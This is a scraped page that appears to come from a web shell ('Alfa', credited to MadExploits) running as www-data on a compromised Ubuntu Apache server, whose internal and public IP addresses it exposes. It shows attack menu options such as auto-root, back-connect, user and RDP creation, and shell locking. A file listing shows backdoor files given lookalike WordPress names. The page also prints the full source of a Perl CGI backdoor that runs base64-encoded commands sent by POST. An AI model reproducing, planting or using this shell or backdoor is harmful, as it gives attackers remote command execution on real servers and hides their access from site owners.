Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 52.14.189.148
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
public /
ALFA_DATA /
alfacgiapi /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
428
B
-rw-r--r--
about.php
251.21
KB
-rw-r--r--
admin.php
26.84
KB
-rw-r--r--
bash.alfa
1.52
KB
-rwxr-xr-x
googleda794cd9937527d01.html
47
B
-rw-r--r--
perl.alfa
542
B
-rwxr-xr-x
py.alfa
463
B
-rwxr-xr-x
wp-admin.php
3.25
KB
-rw-r--r--
wp-corn-sample.php
22.84
KB
-rw-r--r--
wp-include.php
289
B
-rw-r--r--
wp-logln.php
22.97
KB
-rw-r--r--
wp-ver.php
23.81
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : perl.alfa
#!/usr/bin/perl -I/usr/local/bandmin use MIME::Base64;print "Content-type: text/html\n\n";if($ENV{'REQUEST_METHOD'} eq "POST"){my ($i, $key, $val, $in);read(STDIN, $in, $ENV{'CONTENT_LENGTH'});@in = split(/&/, $in);foreach $i (0 .. $#in){$in[$i] =~ s/\+/ /g;($key, $val) = split(/=/, $in[$i], 2);$key =~ s/%(..)/pack("c", hex($1))/ge;$val =~ s/%(..)/pack("c", hex($1))/ge;$in{$key} .= "\0" if (defined($in{$key}));$in{$key} .= $val;}if($in{"cmd"}){print decode_base64($in{"check"})."<pre>";system(decode_base64($in{"cmd"}));print "</pre>"}}
Close